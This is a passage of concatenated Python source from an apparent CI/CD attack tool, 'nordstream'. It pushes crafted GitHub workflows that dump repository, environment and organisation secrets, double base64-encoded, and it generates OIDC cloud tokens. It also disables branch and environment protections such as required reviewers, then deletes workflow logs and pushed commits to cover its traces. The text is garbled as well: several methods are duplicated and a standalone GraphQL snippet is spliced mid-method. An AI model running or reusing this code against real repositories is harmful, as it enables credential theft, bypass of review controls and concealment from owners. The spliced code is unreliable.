logger.error(f"Error in project {name}: {e}") except KeyboardInterrupt: self.__clean(projectId, repoId, deleteRemoteRepo, deleteRemotePipeline) chdir("../") subprocess.Popen(f"rm -rfd ./{self._cicd.repoName}", shell=True).wait() except Exception as e: logger.error(f"Error during pipeline run: {e}") if logger.getEffectiveLevel() == logging.DEBUG: logger.exception(e) self.__clean(projectId, repoId, deleteRemoteRepo, deleteRemotePipeline) chdir("../") subprocess.Popen(f"rm -rfd ./{self._cicd.repoName}", shell=True).wait() else: self.__clean(projectId, repoId, deleteRemoteRepo, deleteRemotePipeline) chdir("../") subprocess.Popen(f"rm -rfd ./{self._cicd.repoName}", shell=True).wait() def describeToken(self): response = self._cicd.getUser() logger.info("Token information:") username = response.get("authenticatedUser").get("properties").get("Account").get("$value") if username != "": logger.raw(f"\t- Username: {username}\n", logging.INFO) id = response.get("authenticatedUser").get("id") if id != "": logger.raw(f"\t- Id: {id}\n", logging.INFO) def __checkRunErrors(self, run): if run.get("customProperties") != None: validationResults = run.get("customProperties").get("ValidationResults", []) msg = "" for res in validationResults: if res.get("result", "") == "error": if "Verify the name and credentials being used" in res.get("message", ""): raise DevOpsError("The stored token is not valid anymore.") msg += res.get("message", "") + "\n" raise DevOpsError(msg) def parseExtractList(self, extractList, allow=True): extractList = extractList.split(",") if extractList else [] self._extractVariableGroups = isAllowed("vg", extractList, allow) self._extractSecureFiles = isAllowed("sf", extractList, allow) self._extractAzureServiceconnections = isAllowed("az", extractList, allow) self._extractGitHubServiceconnections = isAllowed("gh", extractList, allow) self._extractAWSServiceconnections = isAllowed("aws", extractList, allow) self._extractSonarServiceconnections = isAllowed("sonar",
extractList, allow) self._extractSSHServiceConnections = isAllowed("ssh", extractList, allow) ================================================ FILE: nordstream/core/github/display.py ================================================ from nordstream.utils.log import logger import logging from nordstream.core.github.protections import getUsersArray, getTeamsOrAppsArray def displayRepoSecrets(secrets): if len(secrets) != 0: logger.info("Repo secrets:") for secret in secrets: logger.raw(f"\t- {secret}\n", logging.INFO) def displayDependabotRepoSecrets(secrets): if len(secrets) != 0: logger.info("Dependabot repo secrets:") for secret in secrets: logger.raw(f"\t- {secret}\n", logging.INFO) def displayEnvSecrets(env, secrets): if len(secrets) != 0: logger.info(f"{env} secrets:") for secret in secrets: logger.raw(f"\t- {secret}\n", logging.INFO) def displayOrgSecrets(secrets): if len(secrets) != 0: logger.info("Repository organization secrets:") for secret in secrets: logger.raw(f"\t- {secret}\n", logging.INFO) def displayDependabotOrgSecrets(secrets): if len(secrets) != 0: logger.info("Dependabot organization secrets:") for secret in secrets: logger.raw(f"\t- {secret}\n", logging.INFO) def displayEnvSecurity(envDetails): protectionRules = envDetails.get("protection_rules") envName = envDetails.get("name") if len(protectionRules) > 0: logger.info(f'Environment protection for: "{envName}":') for protection in protectionRules: if protection.get("type") == "required_reviewers": for reviewer in protection.get("reviewers"): reviewerType = reviewer.get("type") login = reviewer.get("reviewer").get("login") userId = reviewer.get("reviewer").get("id") logger.raw( f"\t- reviewer ({reviewerType}): {login}/{userId}\n", logging.INFO, ) elif protection.get("type") == "wait_timer": wait = protection.get("wait_timer") logger.raw(f"\t- timer: {wait} min\n", logging.INFO) else: branchPolicy = envDetails.get("deployment_branch_policy") if branchPolicy.get("custom_branch_policies", False): logger.raw(f"\t- deployment branch policy: custom\n", logging.INFO) else: logger.raw(f"\t- deployment branch policy: protected\n", logging.INFO) else: logger.info(f'No environment protection rule found for: "{envName}"') def displayBranchProtectionRules(protections): logger.info("Branch protections:") logger.raw( f'\t- enforce admins: {protections.get("enforce_admins").get("enabled")}\n', logging.INFO, ) logger.raw( "\t- block creations:" f' {protections.get("block_creations").get("enabled")}\n', logging.INFO, ) logger.raw( "\t- required signatures:" f' {protections.get("required_signatures").get("enabled")}\n', logging.INFO, ) logger.raw( "\t- allow force pushes:" f' {protections.get("allow_force_pushes").get("enabled")}\n', logging.INFO, ) logger.raw( "\t- allow deletions:" f' {protections.get("allow_deletions").get("enabled")}\n', logging.INFO, ) if protections.get("restrictions"): displayRestrictions(protections.get("restrictions")) if protections.get("required_pull_request_reviews"): displayRequiredPullRequestReviews(protections.get("required_pull_request_reviews")) else: logger.raw(f"\t- required pull request reviews: False\n", logging.INFO) if protections.get("required_status_checks"): displayRequiredStatusChecks(protections.get("required_status_checks")) logger.raw( "\t- required linear history:" f' {protections.get("required_linear_history").get("enabled")}\n', logging.INFO, ) logger.raw( "\t- required conversation resolution:" f' {protections.get("required_conversation_resolution").get("enabled")}\n', logging.INFO, ) 
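# NOTE (illustrative): the `protections` mapping consumed by
# displayBranchProtectionRules() mirrors GitHub's REST response for
# GET /repos/{owner}/{repo}/branches/{branch}/protection. A minimal stub with
# the toggles the helpers above read (field names follow the documented API,
# values are made up) could look like this:
#
#     example_protections = {
#         "enforce_admins": {"enabled": True},
#         "block_creations": {"enabled": False},
#         "required_signatures": {"enabled": False},
#         "allow_force_pushes": {"enabled": False},
#         "allow_deletions": {"enabled": False},
#         "required_linear_history": {"enabled": False},
#         "required_conversation_resolution": {"enabled": False},
#         "lock_branch": {"enabled": False},
#         "allow_fork_syncing": {"enabled": True},
#         "restrictions": None,
#         "required_pull_request_reviews": None,
#         "required_status_checks": None,
#     }
#     displayBranchProtectionRules(example_protections)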
logger.raw( f'\t- lock branch: {protections.get("lock_branch").get("enabled")}\n', logging.INFO, ) logger.raw( "\t- allow fork syncing:" f' {protections.get("allow_fork_syncing").get("enabled")}\n', logging.INFO, ) def displayRequiredStatusChecks(data): logger.raw(f"\t- required status checks:\n", logging.INFO) logger.raw(f'\t - strict: {data.get("strict")}\n', logging.INFO) if len(data.get("contexts")) != 0: logger.raw(f'\t - contexts: {data.get("contexts")}\n', logging.INFO) if len(data.get("checks")) != 0: logger.raw(f'\t - checks: {data.get("checks")}\n', logging.INFO) def displayRequiredPullRequestReviews(data): logger.raw(f"\t- pull request reviews:\n", logging.INFO) logger.raw(f'\t - approving review count: {data.get("required_approving_review_count")}\n', logging.INFO) logger.raw(f'\t - require code owner reviews: {data.get("require_code_owner_reviews")}\n', logging.INFO) logger.raw(f'\t - require last push approval: {data.get("require_last_push_approval")}\n', logging.INFO) logger.raw(f'\t - dismiss stale reviews: {data.get("dismiss_stale_reviews")}\n', logging.INFO) if data.get("dismissal_restrictions"): users = getUsersArray(data.get("dismissal_restrictions").get("users")) teams = getTeamsOrAppsArray(data.get("dismissal_restrictions").get("teams")) apps = getTeamsOrAppsArray(data.get("dismissal_restrictions").get("apps")) if len(users) != 0 or len(teams) != 0 or len(apps) != 0: logger.raw(f"\t - dismissal_restrictions:\n", logging.INFO) if len(users) != 0: logger.raw(f"\t - users: {users}\n", logging.INFO) if len(teams) != 0: logger.raw(f"\t - teams: {teams}\n", logging.INFO) if len(apps) != 0: logger.raw(f"\t - apps: {apps}\n", logging.INFO) if data.get("bypass_pull_request_allowances"): users = getUsersArray(data.get("bypass_pull_request_allowances").get("users")) teams = getTeamsOrAppsArray(data.get("bypass_pull_request_allowances").get("teams")) apps = getTeamsOrAppsArray(data.get("bypass_pull_request_allowances").get("apps")) if len(users) != 0 or len(teams) != 0 or len(apps) != 0: logger.raw(f"\t - bypass pull request allowances:\n", logging.INFO) if len(users) != 0: logger.raw(f"\t - users: {users}\n", logging.INFO) if len(teams) != 0: logger.raw(f"\t - teams: {teams}\n", logging.INFO) if len(apps) != 0: logger.raw(f"\t - apps: {apps}\n", logging.INFO) def displayRestrictions(data): users = getUsersArray(data.get("users")) teams = getTeamsOrAppsArray(data.get("teams")) apps = getTeamsOrAppsArray(data.get("apps")) if len(users) != 0 or len(teams) != 0 or len(apps) != 0: logger.raw(f"\t- person allowed to push to restricted branches (restrictions):\n", logging.INFO) if len(users) != 0: logger.raw(f"\t - users: {users}\n", logging.INFO) if len(teams) != 0: logger.raw(f"\t - teams: {teams}\n", logging.INFO) if len(apps) != 0: logger.raw(f"\t - apps: {apps}\n", logging.INFO) ================================================ FILE: nordstream/core/github/github.py ================================================ import logging import base64 import glob from zipfile import ZipFile from os import makedirs, chdir from os.path import exists, realpath, basename from nordstream.yaml.github import WorkflowGenerator from nordstream.yaml.custom import CustomGenerator from nordstream.core.github.protections import ( resetRequiredStatusCheck, resetRequiredPullRequestReviews, resetRestrictions, ) from nordstream.core.github.display import * from nordstream.utils.errors import GitHubError, GitPushError, GitHubBadCredentials from nordstream.utils.log import logger, NordStreamLog from 
nordstream.utils.helpers import randomString from nordstream.utils.constants import DEFAULT_WORKFLOW_FILENAME from nordstream.git import Git import subprocess class GitHubWorkflowRunner: _cicd = None _taskName = "command" _workflowFilename = DEFAULT_WORKFLOW_FILENAME _fileName = None _env = None _extractRepo = True _extractEnv = True _extractOrg = True _yaml = None _exploitOIDC = False _tenantId = None _subscriptionId = None _clientId = None _role = None _region = None _forceDeploy = False _disableProtections = None _writeAccessFilter = False _branchAlreadyExists = False _pushedCommitsCount = 0 _cleanLogs = True def __init__(self, cicd, env): self._cicd = cicd self._env = env self.__createLogDir() @property def extractRepo(self): return self._extractRepo @extractRepo.setter def extractRepo(self, value): self._extractRepo = value @property def extractEnv(self): return self._extractEnv @extractEnv.setter def extractEnv(self, value): self._extractEnv = value @property def extractOrg(self): return self._extractOrg @extractOrg.setter def extractOrg(self, value): self._extractOrg = value @property def workflowFilename(self): return self._workflowFilename @workflowFilename.setter def workflowFilename(self, value): self._workflowFilename = value @property def yaml(self): return self._yaml @yaml.setter def yaml(self, value): self._yaml = realpath(value) @property def exploitOIDC(self): return self._exploitOIDC @exploitOIDC.setter def exploitOIDC(self, value): self._exploitOIDC = value @property def tenantId(self): return self._tenantId @tenantId.setter def tenantId(self, value): self._tenantId = value @property def subscriptionId(self): return self._subscriptionId @subscriptionId.setter def subscriptionId(self, value): self._subscriptionId = value @property def clientId(self): return self._clientId @clientId.setter def clientId(self, value): self._clientId = value @property def role(self): return self._role @role.setter def role(self, value): self._role = value @property def region(self): return self._region @region.setter def region(self, value): self._region = value @property def disableProtections(self): return self._disableProtections @disableProtections.setter def disableProtections(self, value): self._disableProtections = value @property def writeAccessFilter(self): return self._writeAccessFilter @writeAccessFilter.setter def writeAccessFilter(self, value): self._writeAccessFilter = value @property def branchAlreadyExists(self): return self._branchAlreadyExists @branchAlreadyExists.setter def branchAlreadyExists(self, value): self._branchAlreadyExists = value @property def pushedCommitsCount(self): return self._pushedCommitsCount @pushedCommitsCount.setter def pushedCommitsCount(self, value): self._pushedCommitsCount = value @property def forceDeploy(self): return self._forceDeploy @forceDeploy.setter def forceDeploy(self, value): self._forceDeploy = value @property def cleanLogs(self): return self._cleanLogs @cleanLogs.setter def cleanLogs(self, value): self._cleanLogs = value def __createLogDir(self): self._cicd.outputDir = realpath(self._cicd.outputDir) + "/github" makedirs(self._cicd.outputDir, exist_ok=True) @staticmethod def __createWorkflowDir(): makedirs(".github/workflows", exist_ok=True) def __extractWorkflowOutput(self, repo): name = self._fileName.strip(".zip") with ZipFile(f"{self._cicd.outputDir}/{repo}/{self._fileName}") as zipOutput: zipOutput.extractall(f"{self._cicd.outputDir}/{repo}/{name}") def __extractSensitiveInformationFromWorkflowResult(self, repo, 
informationType="Secrets"): filePath = self.__getWorkflowOutputFileName(repo) if filePath: with open(filePath, "r") as output: # well it's working data = output.readlines()[-1].split(" ")[1] try: secrets = base64.b64decode(base64.b64decode(data)) except Exception as e: logger.exception(e) logger.success(f"{informationType}:") logger.raw(secrets, logging.INFO) with open(f"{self._cicd.outputDir}/{repo}/{informationType.lower().replace(' ', '_')}.txt", "ab") as file: file.write(secrets) def __getWorkflowOutputFileName(self, repo): name = self._fileName.strip(".zip") filePaths = glob.glob(f"{self._cicd.outputDir}/{repo}/{name}/init/*_{self._taskName}*.txt") logger.debug(filePaths) logger.debug(f"{self._cicd.outputDir}/{repo}/{name}/init/*_{self._taskName}*.txt") if len(filePaths) > 0: filePath = filePaths[0] return filePath else: logger.success(f"Data is accessible here: {self._cicd.outputDir}/{repo}/{name}/") return None def __displayCustomWorkflowOutput(self, repo): filePath = self.__getWorkflowOutputFileName(repo) if filePath: with open(filePath, "r") as output: logger.success("Workflow output:") line = output.readline() while line != "": logger.raw(line, logging.INFO) line = output.readline() def createYaml(self, repo, workflowType): workflowGenerator = WorkflowGenerator() if workflowType == "awsoidc": workflowGenerator.generateWorkflowForOIDCAWSTokenGeneration(self._role, self._region, self._env) elif workflowType == "azureoidc": workflowGenerator.generateWorkflowForOIDCAzureTokenGeneration( self._tenantId, self._subscriptionId, self._clientId, self._env ) else: repo = self._cicd.org + "/" + repo if self._env: try: secrets = self._cicd.listSecretsFromEnv(repo, self._env) except GitHubError as e: # FIXME: Raise an Exception here logger.exception(e) else: secrets = self._cicd.listSecretsFromRepo(repo) if len(secrets) > 0: workflowGenerator.generateWorkflowForSecretsExtraction(secrets, self._env) else: logger.info("No secret found.") logger.success("YAML file: ") workflowGenerator.displayYaml() workflowGenerator.writeFile(self._workflowFilename) def __extractSecretsFromRepo(self, repo): logger.info(f'Getting secrets from repo: "{repo}"') secrets = [] try: if self._extractRepo: secrets += self._cicd.listSecretsFromRepo(repo) # we can't extract dependabot secrets from regular workflows # secrets += self._cicd.listDependabotSecretsFromRepo(repo) if self._extractOrg: secrets += self._cicd.listOrganizationSecretsFromRepo(repo) # we can't extract dependabot secrets from regular workflows # secrets += self._cicd.listDependabotOrganizationSecrets() except GitHubError as e: logger.error(e) if len(secrets) > 0: workflowGenerator = WorkflowGenerator() workflowGenerator.generateWorkflowForSecretsExtraction(secrets) if self.__generateAndLaunchWorkflow(repo, workflowGenerator, "repo", self._env): self.__extractSensitiveInformationFromWorkflowResult(repo) else: logger.info("No secret found") logger.empty_line() def __extractSecretsFromSingleEnv(self, repo, env): logger.info(f'Getting secrets from environment: "{env}" ({repo})') secrets = [] try: secrets = self._cicd.listSecretsFromEnv(repo, env) except GitHubError as e: logger.error(e) if len(secrets) > 0: workflowGenerator = WorkflowGenerator() workflowGenerator.generateWorkflowForSecretsExtraction(secrets, env) if self.__generateAndLaunchWorkflow(repo, workflowGenerator, f"env_{env}", env): self.__extractSensitiveInformationFromWorkflowResult(repo) else: logger.info("No secret found") logger.empty_line() def __extractSecretsFromAllEnv(self, repo): for 
env in self._cicd.listEnvFromrepo(repo): self.__extractSecretsFromSingleEnv(repo, env) def __extractSecretsFromEnv(self, repo): if self._env: self.__extractSecretsFromSingleEnv(repo, self._env) else: self.__extractSecretsFromAllEnv(repo) def __generateAndLaunchWorkflow(self, repo, workflowGenerator, outputName, env=None): policyId = waitTime = reviewers = branchPolicy = envDetails = None try: # disable env protection before launching the workflow if '--force' is not set and env is not null if not self._forceDeploy and env: # check protection and if enabled return the protections envDetails = self.__isEnvProtectionsEnabled(repo, env) if envDetails and len(envDetails.get("protection_rules")): # if --disable-protection disable the env protections if self._disableProtections: ( policyId, waitTime, reviewers, branchPolicy, ) = self.__disableEnvProtections(repo, envDetails) else: raise Exception("Environment protection rule enabled but '--disable-protections' not activated") # start the workflow workflowId, workflowConclusion = self.__launchWorkflow(repo, workflowGenerator) # check workflow status and get result if it's ok return self.__postProcessingWorkflow(repo, workflowId, workflowConclusion, outputName) except GitPushError as e: pass except Exception as e: logger.error(f"Error: {e}") if logger.getEffectiveLevel() == logging.DEBUG: logger.exception(e) finally: # restore protections if self._disableProtections and envDetails: self.__restoreEnvProtections(repo, env, policyId, waitTime, reviewers, branchPolicy) def __launchWorkflow(self, repo, workflowGenerator): logger.verbose(f"Launching workflow.") workflowGenerator.writeFile(f".github/workflows/{self._workflowFilename}") pushOutput = Git.gitPush(self._cicd.branchName) pushOutput.wait() if b"Everything up-to-date" in pushOutput.communicate()[1].strip(): logger.error("Error when pushing code: Everything up-to-date") logger.warning("You're trying to push the same code on an existing branch; modify the YAML file to push it.") raise GitPushError elif pushOutput.returncode != 0: logger.error("Error when pushing code:") logger.raw(pushOutput.communicate()[1], logging.INFO) raise GitPushError else: self._pushedCommitsCount += 1 logger.raw(pushOutput.communicate()[1]) workflowId, workflowConclusion = self._cicd.waitWorkflow(repo, self._workflowFilename) return workflowId, workflowConclusion def __postProcessingWorkflow(self, repo, workflowId, workflowConclusion, outputName): if workflowId and workflowConclusion == "success": logger.success("Workflow has successfully terminated.") self._fileName = self._cicd.downloadWorkflowOutput( repo, f"{outputName.replace('/','_').replace(' ', '_')}", workflowId, ) self.__extractWorkflowOutput(repo) return True elif workflowId and workflowConclusion == "failure": logger.error("Workflow failure:") for reason in self._cicd.getFailureReason(repo, workflowId): logger.error(f"{reason}") return False else: return False def listGitHubRepos(self): logger.info("Listing all repos:") for r in self._cicd.repos: logger.raw(f"- {r}\n", level=logging.INFO) def listGitHubSecrets(self): logger.info("Listing secrets:") if self._extractOrg: self.__displayDependabotOrgSecrets() for repo in self._cicd.repos: logger.info(f'"{repo}" secrets') if self._extractRepo: self.__displayRepoSecrets(repo) if self._extractEnv: self.__displayEnvSecrets(repo) if self._extractOrg: self.__displayOrgSecrets(repo) def __displayRepoSecrets(self, repo): try: secrets = self._cicd.listSecretsFromRepo(repo) displayRepoSecrets(secrets) secrets =
self._cicd.listDependabotSecretsFromRepo(repo) displayDependabotRepoSecrets(secrets) except Exception: if logger.getEffectiveLevel() == NordStreamLog.VERBOSE: logger.error("Can't get repo secrets.") def __displayEnvSecrets(self, repo): try: envs = self._cicd.listEnvFromrepo(repo) except Exception: if logger.getEffectiveLevel() == NordStreamLog.VERBOSE: logger.error("Can't list environment.") return for env in envs: try: secrets = self._cicd.listSecretsFromEnv(repo, env) displayEnvSecrets(env, secrets) except Exception: if logger.getEffectiveLevel() == NordStreamLog.VERBOSE: logger.error(f"Can't get secrets for env {env}.") def __displayOrgSecrets(self, repo): try: secrets = self._cicd.listOrganizationSecretsFromRepo(repo) displayOrgSecrets(secrets) except Exception: if logger.getEffectiveLevel() == NordStreamLog.VERBOSE: logger.error("Can't get org secrets.") def __displayDependabotOrgSecrets(self): try: secrets = self._cicd.listDependabotOrganizationSecrets() displayDependabotOrgSecrets(secrets) except Exception: if logger.getEffectiveLevel() == NordStreamLog.VERBOSE: logger.error("Can't get org secrets.") def getRepos(self, repo): try: if repo: if exists(repo): with open(repo, "r") as file: for repo in file: self._cicd.addRepo(repo.strip()) else: self._cicd.addRepo(repo) else: self._cicd.listRepos() except GitHubBadCredentials: logger.fatal("Invalid token.") if self._writeAccessFilter: self._cicd.filterWriteRepos() if len(self._cicd.repos) == 0: if self._writeAccessFilter: logger.critical("No repository with write access found.") else: logger.critical("No repository found.") def manualCleanLogs(self): logger.info("Deleting logs") for repo in self._cicd.repos: self._cicd.cleanAllLogs(repo, self._workflowFilename) def manualCleanBranchPolicy(self): logger.info("Deleting deployment branch policy") for repo in self._cicd.repos: self._cicd.deleteDeploymentBranchPolicyForAllEnv(repo) def __runCustomWorkflow(self, repo): logger.info(f"Running custom workflow: {self._yaml}") workflowGenerator = CustomGenerator() workflowGenerator.loadFile(self._yaml) self._workflowFilename = basename(self._yaml) if self.__generateAndLaunchWorkflow(repo, workflowGenerator, "custom", self._env): self.__displayCustomWorkflowOutput(repo) logger.empty_line() def __runOIDCTokenGenerationWorfklow(self, repo): workflowGenerator = WorkflowGenerator() if self._tenantId is not None and self._clientId is not None: logger.info("Running OIDC Azure access tokens generation workflow") informationType = "OIDC access tokens" workflowGenerator.generateWorkflowForOIDCAzureTokenGeneration( self._tenantId, self._subscriptionId, self._clientId, self._env ) else: logger.info("Running OIDC AWS credentials generation workflow") informationType = "OIDC credentials" workflowGenerator.generateWorkflowForOIDCAWSTokenGeneration(self._role, self._region, self._env) if self.__generateAndLaunchWorkflow(repo, workflowGenerator, "oidc", self._env): self.__extractSensitiveInformationFromWorkflowResult(repo, informationType=informationType) logger.empty_line() def __runSecretsExtractionWorkflow(self, repo): if self._extractRepo or self._extractOrg: self.__extractSecretsFromRepo(repo) if self._extractEnv: self.__extractSecretsFromEnv(repo) def __deleteRemoteBranch(self): logger.verbose("Deleting remote branch") deleteOutput = Git.gitDeleteRemote(self._cicd.branchName) deleteOutput.wait() if deleteOutput.returncode != 0: logger.error(f"Error deleting remote branch {self._cicd.branchName}") logger.raw(deleteOutput.communicate()[1], logging.INFO) return 
def manualCleanLogs(self): logger.info("Deleting logs") for repo in self._cicd.repos: self._cicd.cleanAllLogs(repo, self._workflowFilename) def manualCleanBranchPolicy(self): logger.info("Deleting deployment branch policy") for repo in self._cicd.repos: self._cicd.deleteDeploymentBranchPolicyForAllEnv(repo) def __runCustomWorkflow(self, repo): logger.info(f"Running custom workflow: {self._yaml}") workflowGenerator = CustomGenerator() workflowGenerator.loadFile(self._yaml) self._workflowFilename = basename(self._yaml) if self.__generateAndLaunchWorkflow(repo, workflowGenerator, "custom", self._env): self.__displayCustomWorkflowOutput(repo) logger.empty_line() def __runOIDCTokenGenerationWorkflow(self, repo): workflowGenerator = WorkflowGenerator() if self._tenantId is not None and self._clientId is not None: logger.info("Running OIDC Azure access tokens generation workflow") informationType = "OIDC access tokens" workflowGenerator.generateWorkflowForOIDCAzureTokenGeneration( self._tenantId, self._subscriptionId, self._clientId, self._env ) else: logger.info("Running OIDC AWS credentials generation workflow") informationType = "OIDC credentials" workflowGenerator.generateWorkflowForOIDCAWSTokenGeneration(self._role, self._region, self._env) if self.__generateAndLaunchWorkflow(repo, workflowGenerator, "oidc", self._env): self.__extractSensitiveInformationFromWorkflowResult(repo, informationType=informationType) logger.empty_line() def __runSecretsExtractionWorkflow(self, repo): if self._extractRepo or self._extractOrg: self.__extractSecretsFromRepo(repo) if self._extractEnv: self.__extractSecretsFromEnv(repo) def __deleteRemoteBranch(self): logger.verbose("Deleting remote branch") deleteOutput = Git.gitDeleteRemote(self._cicd.branchName) deleteOutput.wait() if deleteOutput.returncode != 0: logger.error(f"Error deleting remote branch {self._cicd.branchName}") logger.raw(deleteOutput.communicate()[1], logging.INFO) return False return True def __clean(self, repo, cleanRemoteLogs=True): if self._pushedCommitsCount > 0: if cleanRemoteLogs: logger.info("Cleaning logs.") try: self._cicd.cleanAllLogs(repo, self._workflowFilename) except Exception as e: logger.error(f"Error while cleaning logs: {e}") if self._cicd.isGHSToken(): logger.warning("This might be due to the GHS token.") logger.verbose("Cleaning commits.") if self._branchAlreadyExists and self._cicd.branchName != self._cicd.defaultBranchName: Git.gitUndoLastPushedCommits(self._cicd.branchName, self._pushedCommitsCount) else: if not self.__deleteRemoteBranch(): logger.info("Cleaning remote branch.") # remove everything if we can't delete the branch (leave one file, otherwise the push would delete the branch itself) Git.gitCleanRemote(self._cicd.branchName, leaveOneFile=True) def start(self): for repo in self._cicd.repos: logger.success(f'"{repo}"') url = f"https://foo:{self._cicd.token}@github.com/{repo}" Git.gitClone(url) repoShortName = repo.split("/")[1] chdir(repoShortName) self._pushedCommitsCount = 0 self._branchAlreadyExists = Git.gitRemoteBranchExists(self._cicd.branchName) Git.gitInitialization(self._cicd.branchName, branchAlreadyExists=self._branchAlreadyExists) try: # check and disable branch protection rules protections = None if not self._forceDeploy: protections = self.__checkAndDisableBranchProtectionRules(repo) self.__createWorkflowDir() self.__dispatchWorkflow(repo) except KeyboardInterrupt: pass except Exception as e: logger.error(f"Error: {e}") if logger.getEffectiveLevel() == logging.DEBUG: logger.exception(e) finally: self.__clean(repo, cleanRemoteLogs=self._cleanLogs) # if we are working with the default nord-stream branch, the branch was already deleted during the previous clean operation, so there is nothing to restore if self._cicd.branchName != self._cicd.defaultBranchName: if protections: self.__resetBranchProtectionRules(repo, protections) chdir("../") subprocess.Popen(f"rm -rfd ./{repoShortName}", shell=True).wait() logger.info(f"Check output: {self._cicd.outputDir}") def __dispatchWorkflow(self, repo): if self._yaml: self.__runCustomWorkflow(repo) elif self._exploitOIDC: self.__runOIDCTokenGenerationWorkflow(repo) else: self.__runSecretsExtractionWorkflow(repo) def __checkAllEnvSecurity(self, repo): try: for env in self._cicd.listEnvFromrepo(repo): self.__checkSingleEnvSecurity(repo, env) except GitHubError as e: logger.error(f"Error while getting env security: {e}") if self._cicd.isGHSToken(): logger.warning("This might be due to the GHS token.") def __checkSingleEnvSecurity(self, repo, env): envDetails = self._cicd.getEnvDetails(repo, env) displayEnvSecurity(envDetails) def checkBranchProtections(self): for repo in self._cicd.repos: logger.info(f'Checking security: "{repo}"') # TODO: check branch-wide protection # For now, it's not available in the REST API. It could still be performed using the GraphQL API. # https://github.com/github/safe-settings/issues/311
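# A minimal standalone sketch (not part of the tool) of how branch-wide
# protection rules could be listed through that GraphQL API. The
# repository.branchProtectionRules field is part of the public GitHub GraphQL
# schema; the owner, name and token values are placeholders.
import requests

GQL = """
query($owner: String!, $name: String!) {
  repository(owner: $owner, name: $name) {
    branchProtectionRules(first: 100) {
      nodes { pattern allowsForcePushes allowsDeletions requiresApprovingReviews }
    }
  }
}
"""
r = requests.post(
    "https://api.github.com/graphql",
    json={"query": GQL, "variables": {"owner": "some-org", "name": "some-repo"}},
    headers={"Authorization": "Bearer <token>"},
)
print(r.json())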
protectionEnabled = False url = f"https://foo:{self._cicd.token}@github.com/{repo}" Git.gitClone(url) repoShortName = repo.split("/")[1] chdir(repoShortName) self._pushedCommitsCount = 0 self._branchAlreadyExists = Git.gitRemoteBranchExists(self._cicd.branchName) Git.gitInitialization(self._cicd.branchName, branchAlreadyExists=self._branchAlreadyExists) try: protectionEnabled, protection = self.__checkAndGetBranchProtectionRules(repo) if protectionEnabled: if protection: displayBranchProtectionRules(protection) else: logger.info( "Not enough privileges to get protection rules or 'Restrict pushes that create matching branches' is enabled. Check another branch." ) self.__checkAllEnvSecurity(repo) except Exception as e: if logger.getEffectiveLevel() == logging.DEBUG: logger.exception(e) finally: # don't clean remote logs as we didn't push any workflow here. self.__clean(repo, cleanRemoteLogs=False) chdir("../") subprocess.Popen(f"rm -rfd ./{repoShortName}", shell=True).wait() def _checkBranchProtectionRules(self, repo): protectionEnabled = False try: protectionEnabled = self._cicd.checkBranchProtectionRules(repo) except GitHubError: pass if not protectionEnabled: fileName = randomString(5) + "_test_push.md" Git.gitCreateDummyFile(fileName) pushOutput = Git.gitPush(self._cicd.branchName) pushOutput.wait() if pushOutput.returncode != 0: logger.error("Error when pushing code:") logger.raw(pushOutput.communicate()[1], logging.INFO) return True else: self._pushedCommitsCount += 1 try: protectionEnabled = self._cicd.checkBranchProtectionRules(repo) except GitHubError: pass return protectionEnabled def __checkAndDisableBranchProtectionRules(self, repo): protectionEnabled, protection = self.__checkAndGetBranchProtectionRules(repo) if protectionEnabled: if protection: displayBranchProtectionRules(protection) else: logger.info( "Not enough privileges to get protection rules or 'Restrict pushes that create matching branches' is enabled. Check another branch." ) if protection and self.disableProtections: if self._cicd.branchName != self._cicd.defaultBranchName: logger.warning("Removing branch protection, wait until it's restored.") else: # no need to restore branch protection if we are working with the default # nord-stream branch logger.warning("Removing branch protection.") self._cicd.disableBranchProtectionRules(repo) return protection elif self.disableProtections: # if we can't list protection this means that we don't have enough privileges raise Exception( "Not enough privileges to disable protection rules or 'Restrict pushes that create matching branches' is enabled. Check another branch."
) else: raise Exception("Branch protection rule enabled but '--disable-protections' not set.") return None def __checkAndGetBranchProtectionRules(self, repo): protectionEnabled = self._checkBranchProtectionRules(repo) if protectionEnabled: logger.info(f'Found branch protection rule on "{self._cicd.branchName}" branch') try: protection = self._cicd.getBranchesProtectionRules(repo) return True, protection except GitHubError: return True, None else: logger.info(f'No branch protection rule found on "{self._cicd.branchName}" branch') return False, None def __isEnvProtectionsEnabled(self, repo, env): envDetails = self._cicd.getEnvDetails(repo, env) protectionRules = envDetails.get("protection_rules") if len(protectionRules) > 0: displayEnvSecurity(envDetails) return envDetails else: logger.verbose("No environment protection rule found") return False def __disableEnvProtections(self, repo, envDetails): protectionRules = envDetails.get("protection_rules") branchPolicy = envDetails.get("deployment_branch_policy") waitTime = 0 reviewers = [] policyId = None env = envDetails.get("name") try: logger.warning("Modifying env protection, wait until it's restored.") if branchPolicy and branchPolicy.get("custom_branch_policies", False): policyId = self._cicd.createDeploymentBranchPolicy(repo, env) for protection in protectionRules: if protection.get("type") == "required_reviewers": for reviewer in protection.get("reviewers"): reviewers.append( { "type": reviewer.get("type"), "id": reviewer.get("reviewer").get("id"), } ) if protection.get("type") == "wait_timer": waitTime = protection.get("wait_timer") self._cicd.modifyEnvProtectionRules(repo, env, 0, [], branchPolicy) except GitHubError: raise Exception("Environment protection rule enabled but not enough privileges to disable it.") return policyId, waitTime, reviewers, branchPolicy def __restoreEnvProtections(self, repo, env, policyId, waitTime, reviewers, branchPolicy): logger.warning("Restoring env protections.") if policyId is not None: self._cicd.deleteDeploymentBranchPolicy(repo, env) self._cicd.modifyEnvProtectionRules(repo, env, waitTime, reviewers, branchPolicy) def describeToken(self): if self._cicd.isGHSToken(): response = self._cicd.getLoginWithGraphQL().json() logger.info("Token information:") login = response.get("data").get("viewer").get("login") if login is not None: logger.raw(f"\t- Login: {login}\n", logging.INFO) else: response = self._cicd.getUser() headers = response.headers response = response.json() logger.info("Token information:") login = response.get("login") if login is not None: logger.raw(f"\t- Login: {login}\n", logging.INFO) isAdmin = response.get("site_admin") if isAdmin is not None: logger.raw(f"\t- IsAdmin: {isAdmin}\n", logging.INFO) email = response.get("email") if email is not None: logger.raw(f"\t- Email: {email}\n", logging.INFO) id = response.get("id") if id is not None: logger.raw(f"\t- Id: {id}\n", logging.INFO) bio = response.get("bio") if bio is not None: logger.raw(f"\t- Bio: {bio}\n", logging.INFO) company = response.get("company") if company is not None: logger.raw(f"\t- Company: {company}\n", logging.INFO) tokenScopes = headers.get("x-oauth-scopes") if tokenScopes is not None: scopes = tokenScopes.split(", ") if len(scopes) != 0: logger.raw("\t- Token scopes:\n", logging.INFO) for scope in scopes: logger.raw(f"\t - {scope}\n", logging.INFO) def 